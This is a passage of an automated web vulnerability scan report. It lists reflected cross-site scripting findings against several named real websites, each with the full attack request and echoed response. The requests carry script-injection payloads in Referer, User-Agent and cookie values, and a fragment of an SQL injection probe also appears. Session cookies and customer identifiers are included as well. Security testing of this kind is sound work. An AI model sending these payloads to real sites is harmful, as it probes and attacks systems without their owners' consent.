<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr
...[SNIP]...
5.128. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d6bc"-alert(1)-"f4dec4eed60 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: 5d6bc"-alert(1)-"f4dec4eed60
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083848|check#true#1301082048; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:47:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24596


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="5d6bc"-alert(1)-"f4dec4eed60";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...
5.129. https://www.territoryahead.com/account/login/loginmain%20.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d915e--><script>alert(1)</script>15454db3650 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Referer: http://www.google.com/search?hl=en&q=d915e--><script>alert(1)</script>15454db3650

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:53 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36933


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
t; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
Referer: http://www.google.com/search?hl=en&q=d915e--><script>alert(1)</script>15454db3650
UNIQUE_ID: mDkX8qwSrSgAAET8808AAAA5
SCRIPT_URL: /account/login/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account/login/loginmain .jsp
HTTPS: on

Cookies:
mmlID = 68
...[SNIP]...
5.130. https://www.territoryahead.com/account/login/loginmain%20.jsp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload b001b--><script>alert(1)</script>8cb69a80b72 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16b001b--><script>alert(1)</script>8cb69a80b72
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:26:02 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36882


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ers:
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16b001b--><script>alert(1)</script>8cb69a80b72
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: IS
...[SNIP]...
5.131. https://www.territoryahead.com/jump.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3ba62--><script>alert(1)</script>19ec2497be6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Referer: http://www.google.com/search?hl=en&q=3ba62--><script>alert(1)</script>19ec2497be6

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:27:09 GMT
Server: Apache
ETag: "AAAAS7ucUQm"
Last-Modified: Fri, 25 Mar 2011 19:15:23 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38498


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
57cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29
Referer: http://www.google.com/search?hl=en&q=3ba62--><script>alert(1)</script>19ec2497be6
UNIQUE_ID: lH5ufKwSrSgAAH2NuOoAAAAl
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.jsp
HTTPS: on

Cookies:
mmlID = 68408168
CoreID6 = 8280633328661299090
...[SNIP]...
5.132. https://www.territoryahead.com/jump.jsp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 926e9--><script>alert(1)</script>5e35377ec36 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16926e9--><script>alert(1)</script>5e35377ec36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:27:00 GMT
Server: Apache
ETag: "AAAAS7ucSNw"
Last-Modified: Fri, 25 Mar 2011 19:15:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38447


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ers:
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16926e9--><script>alert(1)</script>5e35377ec36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: IS
...[SNIP]...
5.133. http://portal.smartertools.com/ST.ashx [siteuidut cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /ST.ashx

Issue detail

The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload fe233<script>alert(1)</script>e5e34b07103 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942bfe233<script>alert(1)</script>e5e34b07103; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; __utma=61502381.1558309378.1300551951.1300557309.1300912321.4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:40 GMT
Content-Length: 33118

this.STVisitorValue = "1dad4e31be764ea7b431d43fbac2942bfe233<script>alert(1)</script>e5e34b07103";this.STCallbackInterval = 8000;this.STHandlerFile = "ST.ashx";this.STStopCallbackAfterMs = 900000;this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPo
...[SNIP]...
5.134. http://www.aol.com/ [dlact cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e131d"-alert(1)-"4408da0b00a was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; stips5=1; dlact=dl3e131d"-alert(1)-"4408da0b00a; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; s_pers=%20s_getnr%3D1301171833374-Repeat%7C1364243833374%3B%20s_nrgvo%3DRepeat%7C1364243833377%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcommem%253D%252526pid%25253Dacm%25252520%2525253A%25252520main5%25252520AOL.com%252525205.0%25252520Main%252526pidt%25253D1%252526oid%25253Daol-jumpbar1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc17.websys.aol.com
Content-Type: text/html;;charset=utf-8
Content-Length: 71380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl3e131d"-alert(1)-"4408da0b00a";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 14;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...
5.135. https://www.territoryahead.com/account/login/loginmain%20.jsp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 97c44--><script>alert(1)</script>24a58cae691 was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209497c44--><script>alert(1)</script>24a58cae691; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209497c44--><script>alert(1)</script>24a58cae691; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=
...[SNIP]...
5.136. https://www.territoryahead.com/account/login/loginmain%20.jsp [PS_ALL cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the PS_ALL cookie is copied into an HTML comment. The payload 1a21a--><script>alert(1)</script>b0d0d16d38e was submitted in the PS_ALL cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount1a21a--><script>alert(1)</script>b0d0d16d38e

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
n-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount1a21a--><script>alert(1)</script>b0d0d16d38e; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: mAN4LawSrSgAAH0dJF4AAABL
SCRIPT_
...[SNIP]...
5.137. https://www.territoryahead.com/account/login/loginmain%20.jsp [customer cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the customer cookie is copied into an HTML comment. The payload 5093e--><script>alert(1)</script>bdfc4321075 was submitted in the customer cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=926439315093e--><script>alert(1)</script>bdfc4321075; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
te,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=926439315093e--><script>alert(1)</script>bdfc4321075; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=1301083737353
UNIQUE_ID: l-MVN6
...[SNIP]...
5.138. https://www.territoryahead.com/account/login/loginmain%20.jsp [mmlID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the mmlID cookie is copied into an HTML comment. The payload 36d2e--><script>alert(1)</script>1deb5b8a81e was submitted in the mmlID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=6840816836d2e--><script>alert(1)</script>1deb5b8a81e; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:45 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
